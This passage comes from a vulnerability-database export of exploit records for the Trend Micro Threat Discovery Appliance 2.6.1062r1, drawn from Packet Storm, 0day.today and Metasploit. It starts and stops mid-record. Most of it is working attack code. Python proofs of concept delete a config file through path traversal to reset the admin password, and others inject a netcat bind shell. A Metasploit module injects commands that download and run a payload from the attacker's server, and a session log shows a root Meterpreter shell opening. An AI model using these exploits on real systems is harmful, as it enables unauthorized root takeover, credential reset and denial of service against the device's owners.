\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <option [reset][login]> \n(+) eg: ./poc.py 172.16.175.123 reset \n(+) eg: ./poc.py 172.16.175.123 login \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login \n(-) login failed \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset \n(+) resetting the default password... \n(+) success! now wait for a reboot... \nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login \n(+) logged in... \n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1 \n \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \no = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \no_url = \"%scgi-bin/logoff.cgi\" % bu \n \nif o.lower() == \"login\": \n# default password \nr = requests.post(l_url, data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \nmatch = re.search(\"session_id=(.*); path\", r.headers['set-cookie']) \nif match: \nprint \"(+) authenticated session_id: %s\" % match.group(1) \nelse: \nprint \"(-) login failed\" \nelif o.lower() == \"reset\": \nprint \"(+) resetting the default password...\" \nr = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False) \n# causes an uninitialized free() vulnerability as well... \nif \"Memory map\" in r.text: \nprint \"(+) success! now wait for a reboot...\" \nelse: \nprint \"(-) not a valid option!\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142225/tmtda261062rllo-traversal.txt"}, {"lastseen": "2017-04-19T01:27:17", "description": "", "published": "2017-04-19T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-7547"], "modified": "2017-04-19T00:00:00", "id": "PACKETSTORM:142201", "href": "https://packetstormsecurity.com/files/142201/Trend-Micro-Threat-Discovery-Appliance-admin_sys_time.cgi-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution', \n'Description' => %q{ \nThis module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. \nThe first is an authentication bypass vulnerability via a file delete in logoff.cgi \nwhich resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). \nThe second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi \ninterface (CVE-2016-7547). \n \nNote: You have the option to use the authentication bypass or not since it requires \nthat the server is rebooted. The password reset will render the authentication useless. \nTypically, if an administrator cant login, they will bounce the box. Therefore, this \nmodule performs a heart beat request until the box is bounced and then attempts to login \nand to perform the command injection. This module has been tested on version 2.6.1062r1 \nof the appliance. \n}, \n'Author' => \n[ \n'mr_me <steventhomasseeley@gmail.com>', # vuln + msf \n'Roberto Suggi Liverani @malerisch', # vuln + msf \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'URL', 'https://asciinema.org/a/112480'], # demo \n[ 'CVE', '2016-7552'], # auth bypass \n[ 'CVE', '2016-7547'], # cmdi \n], \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n[ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ] \n], \n'DefaultOptions' => \n{ \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Apr 10 2017')) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'The target URI', '/']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']), \nOptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), \nOptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]), \n \n], self.class) \nend \n \ndef check \nif do_login \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'), \n'cookie' => @cookie, \n'method' => 'GET', \n}, 1) \nif res and res.code == 200 and res.body =~ /About Trend Micro/ \nversion = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/ \ncase version \nwhen /2.6.1062/ \nreturn Exploit::CheckCode::Vulnerable \nend \nend \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nif datastore['AUTHBYPASS'] \nprint_status(\"Bypassing authentication...\") \nif reset_password \nprint_good(\"The password has been reset!\") \nprint_status(\"Waiting for the administrator to reboot...\") \npwn_after_reboot \nend \nelse \nif do_login \npwn \nelse \nfail_with(Failure::NoAccess, \"Authentication failed\") \nend \nend \nend \n \ndef reset_password \nc = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\" \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'), \n'method' => 'GET', \n'cookie' => c, \n}) \n \nif res and res.code == 200 and res.headers.to_s =~ /Backtrace/ \nreturn true \nend \nreturn false \nend \n \ndef pwn \nstart_http_server \nprint_good(\"Logged in\") \ndownload_exec \nend \n \ndef pwn_after_reboot \n@rebooted = false \nwhile !@rebooted \nif do_login \n@rebooted = true \npwn \nend \nend \nend \n \ndef on_request_uri(cli, request) \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@elf_sent = true \nsend_response(cli, @pl) \nend \n \ndef start_http_server \n@pl = generate_payload_exe \n@elf_sent = false \n \ndownfile = rand_text_alpha(8+rand(8)) \nresource_uri = '/' + downfile \n \n# do not use SSL for the attacking web server \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \n@service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri \nservice_url_payload = srv_host + resource_uri \n \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\") \nstart_service({'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => resource_uri \n}}) \n \ndatastore['SSL'] = true if ssl_restore \nconnect \nend \n \ndef exec(cmd) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'), \n'cookie' => @cookie, \n'method' => 'POST', \n'vars_post' => { \n'act' => 'save', \n'timezone' => cmd, \n} \n}, 1) \nend \n \ndef download_exec \n@bd = rand_text_alpha(8+rand(8)) \nregister_file_for_cleanup(\"/tmp/#{@bd}\") \nexec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\") \nexec(\"|`chmod 755 /tmp/#{@bd}`\") \nexec(\"|`/tmp/#{@bd}`\") \n \n# we need to delay, for the stager \nselect(nil, nil, nil, 5) \nend \n \ndef do_login \n \nbegin \nlogin = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'cgi-bin/logon.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'passwd' => datastore['PASSWORD'], \n'isCookieEnable' => 1, \n} \n}) \n \n# these are needed due to the reboot \nrescue Rex::ConnectionRefused \nreturn false \nrescue Rex::ConnectionTimeout \nreturn false \nend \nif login and login.code == 200 and login.body =~ /frame\\.cgi/ \n@cookie = \"session_id=#{$1};\" if login.get_cookies =~ /session_id=(.*);/ \nreturn true \nend \nreturn false \nend \nend \n=begin \nsaturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/trend.rc \n[*] Processing scripts/trend.rc for ERB directives. \nresource (scripts/trend.rc)> use exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi \nresource (scripts/trend.rc)> set RHOST 192.168.100.2 \nRHOST => 192.168.100.2 \nresource (scripts/trend.rc)> set payload linux/x86/meterpreter/reverse_tcp \npayload => linux/x86/meterpreter/reverse_tcp \nresource (scripts/trend.rc)> set LHOST 192.168.100.13 \nLHOST => 192.168.100.13 \nresource (scripts/trend.rc)> exploit \n[*] Exploit running as background job. \n \n[*] Started reverse TCP handler on 192.168.100.13:4444 \n[*] Bypassing authentication... \nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > \n[+] The password has been reset! \n[*] Waiting for the reboot... \n[*] 192.168.100.2:443 - Starting up our web service on http://192.168.100.13:1337/nnDBuOUMuKnxP ... \n[*] Using URL: http://0.0.0.0:1337/nnDBuOUMuKnxP \n[*] Local IP: http://192.168.100.13:1337/nnDBuOUMuKnxP \n[+] Logged in \n[*] 192.168.100.2:443 - Sending the payload to the server... \n[*] Transmitting intermediate stager for over-sized stage...(105 bytes) \n[*] Sending stage (1495599 bytes) to 192.168.100.2 \n[*] Meterpreter session 1 opened (192.168.100.13:4444 -> 192.168.100.2:46140) at 2016-09-23 14:59:08 -0500 \n[+] Deleted /tmp/rpNDXQZTB \n[*] Server stopped. \n \nmsf exploit(trendmicro_threat_discovery_admin_sys_time_cmdi) > sessions -i 1 \n[*] Starting interaction with 1... \n \nmeterpreter > shell \nProcess 3846 created. \nChannel 1 created. \n \n \nBusyBox v1.00 (2010.10.13-06:52+0000) Built-in shell (ash) \nEnter 'help' for a list of built-in commands. \n \n/bin/sh: can't access tty; job control turned off \n/opt/TrendMicro/MinorityReport/www/cgi-bin # id \nid \nuid=0(root) gid=0(root) \n/opt/TrendMicro/MinorityReport/www/cgi-bin # \n=end \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142201/trendmicro_threat_discovery_admin_sys_time_cmdi.rb.txt"}, {"lastseen": "2017-04-20T03:25:30", "description": "", "published": "2017-04-20T00:00:00", "type": "packetstorm", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dlp.cgi Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7552", "CVE-2016-8590"], "modified": "2017-04-20T00:00:00", "id": "PACKETSTORM:142218", "href": "https://packetstormsecurity.com/files/142218/Trend-Micro-Threat-Discovery-Appliance-2.6.1062r1-log_query_dlp.cgi-Remote-Code-Execution.html", "sourceData": "`#!/usr/local/bin/python \n\"\"\" \nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Remote Code Execution Vulnerability \nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso \nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9 \nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 \n \nSummary: \n======== \n \nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root. \n \nNotes: \n====== \n \n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \nexec a bind shell using netcat. \n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts... \n- Auth is now bypassed, please see CVE-2016-7552 \n \nExample: \n======== \n \nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <pass> \n(+) eg: ./poc.py 172.16.175.123 admin123 \nsaturn:trend_micro_threat_discovery_log_query_dlp_rce mr_me$ ./poc.py 172.16.175.123 admin \n(+) logged in... \n(+) starting backdoor, this will take a few secs... \n(+) calling backdoor! \nid \nuid=0(root) gid=0(root) \nuname -a \nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown \nexit \n\"\"\" \n \nimport re \nimport os \nimport sys \nimport time \nimport requests \nimport threading \n \nrequests.packages.urllib3.disable_warnings() \n \nif len(sys.argv) != 3: \nprint \"(+) usage: %s <target> <pass>\" % sys.argv[0] \nprint \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0] \nsys.exit(-1) \n \nt = sys.argv[1] \np = sys.argv[2] \n \nbu = \"https://%s/\" % t \nl_url = \"%scgi-bin/logon.cgi\" % bu \ne_url = \"%scgi-bin/log_query_dlp.cgi\" % bu \n \ns = requests.Session() \n \ndef exec_bd(s, e_url): \n# now we setup our backdoor \n# no reverse, since it seems to fail !? \nnetcat = \"test|`nc -e /bin/sh -lp 1337`\" \ne_url += \"?act=search_advanced&cache_id=%s\" % netcat \ns.get(e_url, verify=False) \n \n# first we login... \nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False) \nif \"frame.cgi\" in r.text: \nprint \"(+) logged in...\" \n \nthread = threading.Thread(target=exec_bd, args=(s, e_url,)) \nthread.start() \n \nprint \"(+) starting backdoor, this will take a few secs...\" \ntime.sleep(4) \n \nprint \"(+) calling backdoor!\" \nos.system(\"nc %s 1337\" % t) \n \nelse: \nprint \"(-) login failed\" \nsys.exit(-1) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142218/tmtda261062rllqp-exec.txt"}], "zdt": [{"lastseen": "2018-04-05T01:39:14", "description": "Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a logoff.cgi directory traversal authentication bypass vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 logoff.cgi Directory Traversal Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7552"], "modified": "2017-04-20T00:00:00", "id": "1337DAY-ID-27635", "href": "https://0day.today/exploit/description/27635", "sourceData": "#!/usr/local/bin/python\r\n\"\"\"\r\nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability\r\nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \r\nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso\r\nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9\r\nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1\r\n\r\nSummary:\r\n========\r\n\r\nThere exists a pre-authenticated directory traversal vulnerability that allows an attacker to delete any folder or file as root. \r\nThis can result in an attacker causing a DoS or bypassing authentication.\r\n\r\nExploitation:\r\n=============\r\n\r\nAn attacker can use this vulnerability to bypass the authentication by reseting the default password back to 'admin'.\r\n\r\n1. Delete the config file /opt/TrendMicro/MinorityReport/etc/igsa.conf\r\n2. Wait for the server to be rebooted...\r\n\r\nIt is highly likely the server will be rebooted because the deletion of the config file causes a DoS condition whereby\r\nno-body can even login... (since the md5 hashed pw is stored in the config file).\r\n\r\nNotes:\r\n======\r\n\r\n- (Un)fortunately, we were not able to find a pre-authenticated way to reboot the server, hence requiring slight user interaction (or patience)\r\n- No username required!\r\n\r\nExample:\r\n========\r\n\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <option [reset][login]>\r\n(+) eg: ./poc.py 172.16.175.123 reset\r\n(+) eg: ./poc.py 172.16.175.123 login\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(-) login failed\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 reset\r\n(+) resetting the default password...\r\n(+) success! now wait for a reboot...\r\nsaturn:trend_micro_threat_discovery_logoff_auth_bypass mr_me$ ./poc.py 172.16.175.123 login\r\n(+) logged in...\r\n(+) authenticated session_id: de685c4feec6d698f8165a8af8489df1\r\n\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <option [reset][login]>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 reset\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 login\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\no = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\no_url = \"%scgi-bin/logoff.cgi\" % bu\r\n\r\nif o.lower() == \"login\":\r\n # default password\r\n r = requests.post(l_url, data={ \"passwd\":\"admin\", \"isCookieEnable\":1 }, verify=False)\r\n if \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n match = re.search(\"session_id=(.*); path\", r.headers['set-cookie'])\r\n if match:\r\n print \"(+) authenticated session_id: %s\" % match.group(1)\r\n else:\r\n print \"(-) login failed\"\r\nelif o.lower() == \"reset\":\r\n print \"(+) resetting the default password...\"\r\n r = requests.get(o_url, cookies={\"session_id\":\"../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"}, verify=False)\r\n # causes an uninitialized free() vulnerability as well...\r\n if \"Memory map\" in r.text:\r\n print \"(+) success! now wait for a reboot...\"\r\nelse:\r\n print \"(-) not a valid option!\"\n\n# 0day.today [2018-04-05] #", "sourceHref": "https://0day.today/exploit/27635", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-19T13:23:33", "description": "Trend Micro Threat Discovery Appliance versions 2.6.1062r1 and below suffer from a log_query_dae.cgi remote code execution vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "zdt", "title": "Trend Micro Threat Discovery Appliance 2.6.1062r1 log_query_dae.cgi Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-8589"], "modified": "2017-04-20T00:00:00", "id": "1337DAY-ID-27630", "href": "https://0day.today/exploit/description/27630", "sourceData": "#!/usr/local/bin/python\r\n\"\"\"\r\nTrend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Remote Code Execution Vulnerability\r\nFound by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ \r\nFile: TDA_InstallationCD.2.6.1062r1.en_US.iso\r\nsha1: 8da4604c92a944ba8f7744641bce932df008f9f9\r\nDownload: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1\r\n\r\nSummary:\r\n========\r\n\r\nThere exists a post authenticated command injection vulnerability that can be used to execute arbitrary code as root.\r\n\r\nNotes:\r\n======\r\n\r\n- Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was \r\nexec a bind shell using netcat.\r\n\r\n- Auth is VERY weak, no privilege seperation, no username required, no password policy, no protection from bruteforce attempts...\r\n- Auth is now bypassed, please see CVE-2016-7552\r\n\r\nExample:\r\n========\r\n\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py \r\n(+) usage: ./poc.py <target> <pass>\r\n(+) eg: ./poc.py 172.16.175.123 admin123\r\nsaturn:trend_micro_threat_discovery_log_query_dae_rce mr_me$ ./poc.py 172.16.175.123 admin\r\n(+) logged in...\r\n(+) starting backdoor, this will take a few secs...\r\n(+) calling backdoor!\r\nid\r\nuid=0(root) gid=0(root)\r\nuname -a\r\nLinux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport time\r\nimport requests\r\nimport threading\r\n\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nif len(sys.argv) != 3:\r\n print \"(+) usage: %s <target> <pass>\" % sys.argv[0]\r\n print \"(+) eg: %s 172.16.175.123 admin123\" % sys.argv[0]\r\n sys.exit(-1)\r\n\r\nt = sys.argv[1]\r\np = sys.argv[2]\r\n\r\nbu = \"https://%s/\" % t\r\nl_url = \"%scgi-bin/logon.cgi\" % bu\r\ne_url = \"%scgi-bin/log_query_dae.cgi\" % bu\r\n\r\ns = requests.Session()\r\n\r\ndef exec_bd(s, e_url):\r\n # now we setup our backdoor\r\n # no reverse, since it seems to fail !?\r\n netcat = \"test|`nc -e /bin/sh -lp 1338`\"\r\n e_url += \"?act=search_advanced&cache_id=%s\" % netcat\r\n s.get(e_url, verify=False)\r\n\r\n# first we login...\r\nr = s.post(l_url, data={ \"passwd\":p, \"isCookieEnable\":1 }, verify=False)\r\nif \"frame.cgi\" in r.text:\r\n print \"(+) logged in...\"\r\n thread = threading.Thread(target=exec_bd, args=(s, e_url,))\r\n thread.start()\r\n print \"(+) starting backdoor, this will take a few secs...\"\r\n time.sleep(4)\r\n print \"(+) calling backdoor!\"\r\n os.system(\"nc %s 1337\" % t)\r\nelse:\r\n print \"(-) login failed\"\r\n sys.exit(-1)\n\n# 0day.today [2018-02-19] #", "sourceHref": "https://0day.today/exploit/27630", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-07T19:50:45", "description": "This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance. The first is an authentication bypass vulnerability via a file delete in logoff.cgi which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552). The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi interface (CVE-2016-7547). Note: You have the option to use the authentication bypass or not since it requires that the server is rebooted. The password reset will render the authentication useless. Typically, if an administrator cant login, they will bounce the box. Therefore, this module performs a heartbeat request until the box is bounced and then attempts to login and to perform the command injection. This module has been tested on version 2.6.1062r1 of the appliance.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T18:32:58", "type": "metasploit", "title": "Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7547", "CVE-2016-7552"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/TRENDMICRO_THREAT_DISCOVERY_ADMIN_SYS_TIME_CMDI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro Threat Discovery Appliance admin_sys_time.cgi Remote Command Execution',\n 'Description' => %q{\n This module exploits two vulnerabilities the Trend Micro Threat Discovery Appliance.\n The first is an authentication bypass vulnerability via a file delete in logoff.cgi\n which resets the admin password back to 'admin' upon a reboot (CVE-2016-7552).\n The second is a cmdi flaw using the timezone parameter in the admin_sys_time.cgi\n interface (CVE-2016-7547).\n\n Note: You have the option to use the authentication bypass or not since it requires\n that the server is rebooted. The password reset will render the authentication useless.\n Typically, if an administrator cant login, they will bounce the box. Therefore, this\n module performs a heartbeat request until the box is bounced and then attempts to login\n and to perform the command injection. This module has been tested on version 2.6.1062r1\n of the appliance.\n },\n 'Author' =>\n [\n 'mr_me <steventhomasseeley@gmail.com>', # vuln + msf\n 'Roberto Suggi Liverani @malerisch', # vuln + msf\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://asciinema.org/a/112480'], # demo\n [ 'CVE', '2016-7552'], # auth bypass\n [ 'CVE', '2016-7547'], # cmdi\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Targets' =>\n [\n [ 'Trend Micro Threat Discovery Appliance 2.6.1062r1', {} ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-04-10'))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'The target URI', '/']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n OptBool.new('AUTHBYPASS', [ true, 'Bypass the authentication', true ]),\n\n ])\n end\n\n def check\n if do_login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/about.cgi'),\n 'cookie' => @cookie,\n 'method' => 'GET',\n }, 1)\n if res and res.code == 200 and res.body =~ /About Trend Micro/\n version = \"#{$1}\" if res.body =~ /var ver_str = new String\\(\"(.*)\"\\)/\n case version\n when /2.6.1062/\n return Exploit::CheckCode::Vulnerable\n end\n end\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n if datastore['AUTHBYPASS']\n print_status(\"Bypassing authentication...\")\n if reset_password\n print_good(\"The password has been reset!\")\n print_status(\"Waiting for the administrator to reboot...\")\n pwn_after_reboot\n end\n else\n if do_login\n pwn\n else\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n end\n end\n\n def reset_password\n c = \"session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf\"\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/logoff.cgi'),\n 'method' => 'GET',\n 'cookie' => c,\n })\n\n if res and res.code == 200 and res.headers.to_s =~ /Backtrace/\n return true\n end\n return false\n end\n\n def pwn\n start_http_server\n print_good(\"Logged in\")\n download_exec\n end\n\n def pwn_after_reboot\n @rebooted = false\n while !@rebooted\n if do_login\n @rebooted = true\n pwn\n end\n end\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n @service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri\n service_url_payload = srv_host + resource_uri\n\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def exec(cmd)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'cgi-bin/admin_sys_time.cgi'),\n 'cookie' => @cookie,\n 'method' => 'POST',\n 'vars_post' => {\n 'act' => 'save',\n 'timezone' => cmd,\n }\n }, 1)\n end\n\n def download_exec\n @bd = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n exec(\"|`wget #{@service_url} -O /tmp/#{@bd}`\")\n exec(\"|`chmod 755 /tmp/#{@bd}`\")\n exec(\"|`/tmp/#{@bd}`\")\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n\n def do_login\n\n begin\n login = send_request_cgi({\n 'uri' => 